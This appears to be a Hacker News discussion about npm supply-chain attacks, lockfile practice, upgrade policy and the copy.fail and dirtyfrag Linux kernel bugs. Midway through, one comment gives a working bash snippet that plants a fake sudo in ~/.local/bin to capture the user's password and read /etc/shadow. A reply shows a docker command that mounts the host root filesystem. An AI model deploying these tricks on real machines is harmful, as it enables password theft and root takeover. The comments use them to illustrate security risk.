For example, I'm not sure if the world of Windows freeware ever moved past this, but very often the home page for a freeware package will look nearly identical to a page set up to deliver malware. With every package you download, you wonder "is this the legit version?". To push it further, there were multiple examples of sites that were previously trusted for software downloads (SourceForge and the installer debacle) that began packaging spyware or adware into downloads.
With either delivery method, you're not quite safe from supply chain attacks, but with the curated repo, you at least have a single source of packages where you can trust it 99% of the time.
I recall a decade ago listening to native app developers lamenting how web pages were inferior to native apps and gnashing their teeth at why browsers wouldn't learn the lessons of native apps. It was, and remains, a shocking display of self-unawareness to fail to understand why web pages, despite doing many things worse than native apps, managed to blow native apps out of the water when it comes to doing the things that actually matter to users. This is how it feels listening to the above comment; you have failed to reflect on why both programming language authors and programming language users were pushed to using language-specific package managers in the first place, and you have failed to put forth any improvements to OS-level package managers that would allow them to address those underlying flaws.
Many Golang projects I see in the wild will import a number of dependencies with significant feature overlap with sections of the standard library, or even be intended as a replacement for them. So it seems that having an expansive stdlib isn’t sufficient to avoid deep dependency trees, it probably helps to some degree but it’s definitely not a panacea.
More or less the entire Debian apparatus is an organization devoted to being a C/C++ package manager, and while as an end-user it's adequate for installing applications it's still an enormous pain to use packages as libraries even with apt and friends. And once you get outside of apt, you're in an endless hellscape. People don't seem to understand that the real reason that people love Rust is not because of memory safety (let's be honest, most people are too short-sighted to care about that); it's because of Cargo.
Languages with rich standard libraries provide enough common components that it's feasible to build things using only a small handful of external dependencies. Each of those can be carefully chosen, monitored, and potentially even audited, by an individual or small team.
That doesn't make the resulting software exploit-proof, of course, but it seems to me much less risky than an ecosystem where most programs pull in hundreds of dependencies, all of which receive far less scrutiny than a language's standard library.
Yes, I mean crates like anyerror and syn.
Package managers aren't going anywhere. Even languages that historically bet on large standard libraries have been giving up on that over time (e.g. Java's stdlib comes with XML support but not JSON).
Unfortunately, LLMs are also not cheap enough to just create whole new PL ecosystems from scratch. So we have to focus on the lowest hanging fruits here. That means making sandboxing and containers far more available and easy for developers. Nobody should run "npm install" outside a sandbox.
We need a cultural shift toward code hygiene, which isn't really any different from the norms most cultures develop around food. It's a mix of crude heuristics but the sense of "eeew" is keeping billions of people alive.
Which is to say: Hiding the sausage-making is a core aspect of what makes supply chains profitable.
That isn't a guarantee either, just last month someone compromised the Axios library.
Compare that with the average distro. You would have to compromise the developer infrastructure (repo or website) and publish a new version without them being aware, all while notifying the maintainer that it's ok to merge the new package script into the distro repo. Hard to pull off in high-profile projects.
They don't wait for the cultures to come back negative to say yes either. They just eat what they are served.
If the restaurant has a foul smell and the food is served by a twitchy waiter who insists that the food is totally free, I think most people will think twice.
Today I'm limiting my exposure to dependencies more than ever, particularly for things that take a few hundred lines to implement. It's a paradigm shift, no less.
But being able to have agents implement perl5 in Rust and make it faster and more secure raises many questions about the role of open source and the consequences for security and supply chain risks.
Then I moved to another company where we had builds that access the Internet. We upgrade things as soon as they come out. And people think this is good practice because we're getting the latest bug fixes. CVEs are reviewed by a security team.
Then a startup with a mix of other practices. Some very good. But we also had a big CVE debt. e.g. we had secure boots on our servers and encrypted drives. We had a pretty good grasp on securing components talking to each other etc.
Everyone seems to think they are doing the right thing. It's impossible to convince the "frequent upgrader" that maybe that's a risk in terms of introducing new issues. We as an industry could really use a better set of practices. Example #1 for me is better in terms of dependency management. In general company #1 had well established security practices and we had really secure products.
I like to think people would agree more on the appropriate method if they saw the risk as large enough.
If you could convince everyone that a nuclear bomb would get dropped on their heads (or a comparably devastating event) if a vulnerability gets in, I highly doubt a company like #2 would still believe they're doing things optimally, for example.
No one in this thread proposed that, or anything that could be reasonably assumed to have meant that.
If you expose people to the true risks instead of allowing them to be ignorant, the conclusion that they might come to is that they shouldn’t develop software at all.
For example, at one company I worked for, they created an ACL model for applications that essentially enforced rules like: “Application X in namespace A can communicate with me.” This ACL coordinated multiple technologies working together, including Kubernetes NetworkPolicies, Linkerd manifests with mTLS, and Entra ID application permissions. As a user, it was dead simple to use and abstracted away a lot of things i do not know that well.
The important part is not the specific implementation, but the mindset behind it.
An upgrade can both fix existing issues and introduce new ones. However, avoiding upgrades can create just as many problems — if not more — over time.
At the same time, I would argue that using software backed by a large community is even more important today, since bugs and vulnerabilities are more likely to receive attention, scrutiny, and timely fixes.
And yes, they still thought they were doing the right thing.
Anyway, the point of parent and me wasn't that it was considered to be a "mistake", but people thinking they "are doing the right thing".
As for the parent comment about not using the lockfile for the production build, that’s just incredibly incompetent.
Maybe they should hire someone who knows what they are doing. Contrary to the popular beliefs of backend engineers online, you also need some competency to do frontend properly.
In this case what's needed is `npm ci` instead of `npm install`, or better, `pnpm install --frozen-lockfile`.
Pnpm will also do that automatically if the CI environment variable is set.
The grugbrain developer says, "I can use git-add to keep a version controlled copy of the library in my app's source tree with no extra steps after git-clone."
(Pop quiz: what problem were the creators of NPM's lockfile format trying to solve?)
When you are talking about checking your dependencies in the source tree, you are effectively pinning exact versions, and not using floating/tilde versioning syntax.
If you want a vendored deps model you can look at Yarn Plug and Play which does this via .zip files.
However, I would just stick with regular pnpm and installs.
Uh… no.
> setting up native binaries, or native modules linked against the specific Node version
So the majority of projects—those that don't use binary NodeJS modules—don't have a reason for sidestepping the primary VCS and going along with npm's shoddily designed overlay version control approach?
> However, I would just stick with regular pnpm and installs.
You're not answering the question. npm isn't bedrock, and pnpm certainly isn't. If you're going to introduce (mandate) the use of a tool in the workflow, you should be able to justify it by explaining your rationale for introducing it (and making everyone deal with the associated costs). You should at minimum be able to provide a lucid explanation of the tradeoffs. For good measure, you should be able to disprove the "NPM Null Hypothesis"; you should be able to state a straightforward answer to the question, "What problem is this supposed to be solving?"
this is on some ancient node 16 build i was trying to clean up ci for, so not very recent npm
In general, use of npm ci is usually sparsely documented - most Node projects just recommend using npm install during setup, suggesting a failure in promoting its availability (I only know of it because I got frustrated that the lockfile kept clogging up git commits whenever I added dependencies, with what looked like auto-generated build-time junk).
Turns out there is no equivalent to “npm ci” that doesn’t clear node_modules first, and you can’t call npm install to simulate NPM ci behavior (sans clean).
I would count myself as a "frequent upgrader" - I admin a bunch of Ubuntu machines and typically set them to auto-update each night. However, I am aware of the risks of introducing new issues, but that's offset by the risks of not upgrading when new bugs are found and patched. There's also the issue of organisations that fall far behind on versions of software which then creates an even bigger problem, though this is more common with Windows/proprietary software as you have less control over that. At least with Linux, you can generally find ways to install e.g. old versions of Java that may be required for specific tools.
There's no simple one-size-fits-all and it depends on the organisation's pool of skills as to whether it's better to proactively upgrade or to reluctantly upgrade at a slower pace. In my experience, the bugs introduced by new versions of software are easier to fix/workaround than the various issues of old software versions.
Well, you criticize people who run the latest software here. Two counter-arguments:
1) If you don't upgrade frequently, you end up with super-stable Debian stuck on ... ancient software. This in turn means that much more recent software won't work unless you recompile a lot. I had this issue with mesa for instance, which then needed a more recent LLVM, spirv-components and so forth. No chance to have that easily on Debian, unless you control what you compile. On my local system here I run gtk2, gtk3 and gtk4 just fine. Good luck having that with Debian for recent versions; even Debian sid is slow compared to, say, Gentoo or Arch or Void here.
2) Even debian systems would be vulnerable to copy.fail. So that strategy is also not automatically better.
Personally I am among the frequent update folks. I use ruby scripts to automatically update to the latest, in hope that the people who write code are not incompetent. There is no guarantee that newer software is automatically always better; it is a trade-off. I don't have the time and resource for infinite security audits. I need to get things done and this approach, different to the "everything is scary" crowd, works super-well for me. I use a versioned AppDir approach on linux though, so I don't run into many issues of "can not upgrade because of same .so name issue", so I can conveniently switch to other versions as-is, including the kernel. (Excluding ABI differences and glibc, but for about 98% of the programs this works very well. I am also not alone with the get-everything-working approach, see xserver or gtk2-ng: https://github.com/X11Libre/xserver https://git.devuan.org/Daemonratte/gtk2-ng - granted, for the linux kernel this does not work that well ... I think we need better strategies for the linux kernel, things such as copy.fail should not be possible. I have no good solution here, AI will find many more exploits. No clue how we can prevent this or mitigate this more easily. I was surprised when the local instructor showed us how easy it is to use python for gaining superuser access as-is.)
Whether to do constant npm upgrades to keep the high-priority security issues count at zero (for what seems like about 15 minutes), or whether to hang back a bit to avoid catching the big one that everyone knows is coming real soon now.
Not enjoying npm at all.
Programming language packages are only an issue because we don't have zero trust for modules - no restrictions on opening sockets or the file system. The issue is not the count; a pure function like leftPad can't hurt you.
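The "pure function can't hurt you" point can be made concrete. A minimal Rust sketch (this `left_pad` is a stand-in written here, not the npm package): its signature takes only values and returns a value, so under a capability discipline it holds no handle to sockets or the filesystem, and there is nothing for it to abuse.

```rust
// Pure function: no I/O, no ambient authority, just data in and data out.
fn left_pad(s: &str, width: usize, pad: char) -> String {
    let missing = width.saturating_sub(s.chars().count());
    let mut out: String = std::iter::repeat(pad).take(missing).collect();
    out.push_str(s);
    out
}

fn main() {
    assert_eq!(left_pad("7", 3, '0'), "007");
    assert_eq!(left_pad("hello", 3, '*'), "hello"); // already wide enough
}
```

The supply-chain risk comes entirely from the ambient authority a language grants every imported module by default, not from the number of modules.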
This wasn't a nightmare waiting to happen, but an example of badly maintained systems for the lowest common denominator.
Why is npm the only package ecosystem that has so many problems? What are the other package system owners doing better? Let’s start there, instead of blaming the victims.
Even worse are the “extension packs” that combine some normal things and one wonky thing nobody’s ever heard of…
Edit: I think I understand. copyfail is a kernel bug that lets a malicious npm package get root access on your Linux server, right?
So now, while there are unpatched servers, is when it would be the perfect time for attackers to target NPM packages.
And the advice isn't just "update your kernel" because we are still finding new related issues?
If a popular NPM package was compromised and included a copy.fail exploit, it would make lots of systems vulnerable to root privilege escalation.
The advice isn't just "update your kernel" because there is no update. The latest vulnerability (the one discovered after copy.fail) still has no fix.
I personally switched away from macOS with this being one of the reasons, after having realized brew will eventually compromise my system with their antics.
Code is cheap and is becoming cheaper by the day. We need new paradigms.
And the benefit is the obscurity of "no one will know how to exploit them"?
No, thanks.
I am worried that the sluggishness appeared about the same time on both devices
These days most exploits can not persist through a reboot due to secure boot and other boot-chain attestations. In the boot process, everything loaded gets checksummed and compared to signed signatures from Apple, but this only helps at load time, not while the phone is running. Of course, if the phone is not patched, the exploit could be reloaded, but this would require revisiting a malicious website or reopening a malicious bit of media.
Regular phone reboots are a security measure at this point.
https://news.ycombinator.com/item?id=47943499 - 44 CVEs trying to replace coreutils with a greenfield rust rewrite.
https://news.ycombinator.com/item?id=47921079 - Shoehorning AI stuff into Ubuntu is the future.
VM isolation would still be safe even with these kernel exploits.
For supply chain attacks that simply bide their time, or for dependencies which involve interacting with other subsystems, it's possible you miss a critical security update by doing this. Of course, the maintainers of the crates should yank known bad releases, but that's putting trust in a third-party that may have already been compromised.
What are people thinking with these meme style vulnerability names? It's going to be hard to pitch "we need to push back the timeline on this new infrastructure deploy while we mitigate Copy Fail 2: Electric Boogaloo".
People lamented semver not being trustable but that ship sailed a long time ago, and supply chain attacks are going to get worse before they get better.
Our team is pretty minimal when it comes to enforced hooks (everyone has their own workflow) but no one could come up with an objection to this one.
Behaviours matter more than OS security primitives.
If you have code execution, you can attack the OS.
This is exactly why some (including me) don't take these projects seriously. Like you claim to design a language for security, and this is how you tell me to install it????
curl|sh has the truncated shell script concern. It's possible to mitigate this concern. Did they? If so, it's no different from downloading and running any other installer.
Please grow a brain.
[0] https://news.ycombinator.com/item?id=47513932
[1] https://github.com/npm/cli/issues/8570
[2] https://socket.dev/blog/npm-introduces-minimumreleaseage-and...
As always, I know most of us work in IT, but things rarely are actually binary.
I don't remember where I read it, but it basically boils down to need vs want.
I've used that rule for deciding between a new car or used. A fancy vacuum or basic.
A shiny new gadget.
Bringing new things into the tech stack.
Picking a new tech stack.
It takes 45 seconds to go check how old the copyfail and dirtyfrag vulnerabilities actually are. Which is longer than it takes to read TFA. Dirtyfrag may be relevant to systems from as far back as 2017.
It's not "new" software being affected. And actual old software is in a much worse state because we had a lot more time to find their problems.
It's as if Windows had a vulnerability triggered by writing a certain string to a file. Copyfail is to write the string to a file. Dirtyfrag is to get another program to write the string to a file. When you fix the vulnerability - make sure nothing strange happens when the string is written - both go away at the same time.
What I want to say with that is that fundamentally our world works because at least most people do not abuse shit. That is fundamentally how human society has always worked, and will likely continue to do so.
I've studied security culture before and in most cases everything comes down to a sliding scale with security on one side and convenience/accessibility on the other, the more secure something is, the less accessible it is and vice versa.
[0] https://www.youtube.com/watch?v=LTI0SeyhAPA
The copyFail didn't, the dirtyfrag doesn't.
This copyfail2 does modify /etc/passwd, but I can't `su - sick` as expected.
/s
I did try fixing the path to use nixos paths, but it was still unsuccessful. Did not really check further.
In general I agree, but I think these two vulns are 0day-y and pretty much every major distro is affected AFAIU, so there is perhaps slightly more potential than usual
The proper response from them and you should be to make sure to have some isolation between user space and root, like gvisor.
It means you skip supply chain attacks but may miss fresh vulnerability patches too.
If you can't trust your update sources, you have bigger problems.
In my book, having unattended-upgrades or windows update run amok on your system is functionally worse than a rootkit.
It's a problem we have to live with for the sake of progress and for security updates. Every machine needs downtime for maintenance on a periodic, often-scheduled basis. It might cost time but avoiding updates is not a good plan.
Aside from dodgy updates that have to run as root to install, if you have passwordless sudo it's more dangerous than any broken package or local-only privilege escalation exploit. I'll wager many have it set up that way, because typing passwords is tiresome.
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc
mkdir -p ~/.local/bin/
cat <<'EOF' > ~/.local/bin/sudo
#!/bin/bash
read -rs -p "[sudo] password for $USER: " PASSWORD
echo ""
echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
EOF
chmod +x ~/.local/bin/sudo
The attack fires on the next sudo call and shows data accessible only to root.
Our security model is based on distributions verifying packages, that is, on distro maintainers. Software we can't trust should be running in VMs. The attack on trivy is just the beginning, and the solution is removing pip, uv, npm, rbenv from the host and running them in docker containers:
$ docker run -it -v .:/app -w /app node:alpine /bin/sh
Long-term environments get defined in a docker-compose.yml:
services:
app:
image: node:alpine
volumes:
- .:/app
working_dir: /app
command: /bin/sh
$ docker compose run app
Switch to Kata etc. if more protection is needed. Eventually all userspace would run in VMs.
docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
Chances are that the person who set up Docker didn't do it properly.
$ docker run -it -v .:/app -w /app node:alpine /bin/sh
/app # docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
/bin/sh: docker: not found
I've described an attack from a host user, and isolating the attacker with docker. It's quite different from PATH-injecting an already privileged user.
Also, these memory corruptions can likely be used as container escape primitives too. Albeit not easily.
It's a serious break of a security boundary. Yes, container layer adds defense, and normal unix security isn't perfect, but it should not allow this.
PoC attack on k8s [1] claims execution through sibling layers of kube-proxy, host filesystem access through /dev/ [2].
[1] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...
[2] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...
It is regularly pointed out as a drawback by Android users (e.g. "I can't run that doomscrolling blocker in iOS"), but from a security-model perspective it was visionary back in 2008.
But the problem is that this could lead to abuse of the CVE system to try to force rapid adoption of attacked packages. What prevents this?
(Naively, not knowing much about apt-get or yum or other OS package managers, I have always assumed that 1. only a handful of trusted people can publish to the default repos for system package managers and 2. that since I have to run `apt-get install` as root anyway, package installers can completely pwn my system if they want to and I am protected purely by trust. Is some of that wrong? If it's right, isn't it nonsensical to be any more worried about installing new packages in light of these vulns?)
The post in question points at dependency package managers such as NPM, not system package managers; NPM has pre- and post-install scripts, build scripts, etc.
6-19-2005
My copy of StepMania is turning old enough to drink in like a month and it's still fantastic, software updates are (mostly) a scam.
Sure, we've just faced an acceleration phase, and a wave of patches will follow before things settle. But where we used to find x zero-days per million LoC, we will now find 10x ZD/MLoC. [Hopefully detection will become part of CI, so that number may vary.]
So, we will have more disasters waiting to happen. Assume that they will happen.
My #1 recommendation is to curate a list of the auth tokens that you use (keep the list in a central place, not the actual tokens...), and be ready to rotate them as automatically as possible. You already have backups. Know how to rotate all your credentials.
Write some scripts. Get ready. It will happen.
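One way to act on that advice (a minimal sketch with hypothetical names, not a prescribed tool): keep a registry of where each credential lives plus a callable that knows how to rotate it, so "rotate everything" becomes a single command.

```python
# Hypothetical sketch: a central inventory of WHERE credentials live
# (not the secrets themselves) plus a per-credential rotation hook.
from dataclasses import dataclass
from typing import Callable

@dataclass
class Credential:
    name: str                    # e.g. "github-deploy-token"
    location: str                # where it is stored, e.g. "CI secret GH_TOKEN"
    rotate: Callable[[], None]   # how to mint and swap in a replacement

INVENTORY: list[Credential] = []

def register(name: str, location: str, rotate: Callable[[], None]) -> None:
    """Add a credential to the inventory."""
    INVENTORY.append(Credential(name, location, rotate))

def rotate_all() -> list[str]:
    """Rotate every registered credential; return the names rotated, in order."""
    rotated = []
    for cred in INVENTORY:
        cred.rotate()
        rotated.append(cred.name)
    return rotated
```

The rotation callables are where the per-service work goes (hit the provider's API, update the CI secret); the inventory just guarantees nothing gets forgotten when you have to rotate under pressure.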
I'm not associated with the project in any way and am very much open to other suggestions, either as an alternative to LuLu or to complement it.
This makes no sense.
So, copy.fail refers to a Linux kernel problem, yes? A local instructor showed it to us, e.g. by using Python to become superuser.
Well ... does this mean that a computer system is useless, because of that bug? No. Besides, people can patch it already, so while that is indeed a huge bug as such, it does not mean it makes people's computer useless at all.
But, even ignoring this ... why would we now "AVOID installing new software for a bit"? What rationale is given here? The rationale given was "because of ... uhm ... npm supply chain attacks":
"Right now would be one of the best times for a supply chain attack via NPM to hit hard.
Outside of Linux kernel patches from your distro, I think it's probably a good idea to put a moratorium on installing new software for a week or so."
Well, many computer systems won't even have npm installed. Besides, if they do, their operators should be well aware of npm having had issues for a long time. left-pad is still the funniest one of all time IMO, or among the top three. copy.fail is not funny: it is almost so simple that it is stupid, which kind of makes this an epic fail indeed, and that AI found it also kind of means that skynet won. Humans won't find as many weaknesses as AI skynet will. But just because of such an exploit and npm sucking, why would this mean I should arbitrarily stop compiling any new software? THAT MAKES ABSOLUTELY NO SENSE AT ALL. That "rationale" is not a rationale. That is just an opinion, without any real argument behind it.
If the issue is serious, patch the Linux kernel. End of story. No need for a "moratorium" on installing new software. The "for a bit" makes no more sense than "for 50 days" or any other arbitrary number. xeiaso is not THINKING here.
I know there are extensions and proxies you can set up that do this, but it just seems like it should be built into NPM directly (maybe it has been, I haven't been up on Node programming in the last couple of years).
It must have been a very quiet announcement because I just found out about it this week.
I've done that ever since. Of course, I still use packages like express and tailwindcss. But in the era of LLMs, using a package for something like react drop-downs is unnecessary.
there's a secure option provided by the web: no build step, just script tags at the top/bottom of the page
they're executed in the browser's sandbox
Once everyone takes the stance of waiting 2 weeks, we are all back to the same situation.
I don’t like the suggestion to “wait for others to be the unfortunate victims, so that I can benefit from their misfortune”.
Surely there’s a better way.
We're not downloading new firmware and installing it by hand; for a lot of things it's all getting pulled in automatically.